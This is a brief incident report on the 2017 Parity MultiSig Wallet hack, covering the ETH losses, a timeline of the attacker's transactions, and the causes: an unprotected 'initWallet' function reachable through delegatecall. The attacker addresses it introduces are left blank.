Parity Multisig Wallet Hack Resulting in a $34 Million Loss

Summary

On July 19, 2017, Parity Technologies fell victim to a wallet hack. A vulnerability was discovered and exploited in the Parity MultiSig Wallet version 1.5+, enabling the attacker to take control over the contracts and drain all their funds. The attack resulted in a loss of 153,037 ETH, equivalent to approximately $34 million from three (one, two, and three) wallets.

Attackers

The attacker’s identity remains unknown. Attackers main address:

Losses

The attack led to a loss of 153,037 ETH, equivalent to roughly $34 million at the time of the hack. As of July 4, 2023, the attacker controls over $246 million in 125,995 ETH, which remain at the following addresses:

The rest of the initially stolen funds were laundered via TornadoCash and other services.

Timeline

  • July 18, 2017 10:28:36 PM UTC: The attacker executed the first transaction to obtain exclusive ownership of the MultiSig Wallet.
  • July 18, 2017 10:33:23 PM UTC: The attacker executed a second transaction to transfer funds to his wallet.
  • July 19, 2017 10:50:05 PM UTC: The attacker transferred 70,000 ETH to 7 EOA addresses, 10,000 ETH each.
  • July 19, 2017: OpenZeppelin published a report, asserting that their MultiSig Wallet is not impacted by the mentioned vulnerability.
  • July 20, 2017: Parity Technologies published a post-mortem, mentioning that they had disabled the faulty code.

Security Failure Causes

Poor Coding Practices: The flaw was found in the “initWallet” function of the Parity Multisig Wallet, which can change the contract’s owners. It lacked checks to prevent an attacker from calling it after the contract was initialized.

Delegated Call Use: The use of delegatecall as a catch-all forwarding mechanism contributed to the vulnerability. This made all public functions from the library callable by anyone, including the ‘initWallet’ function.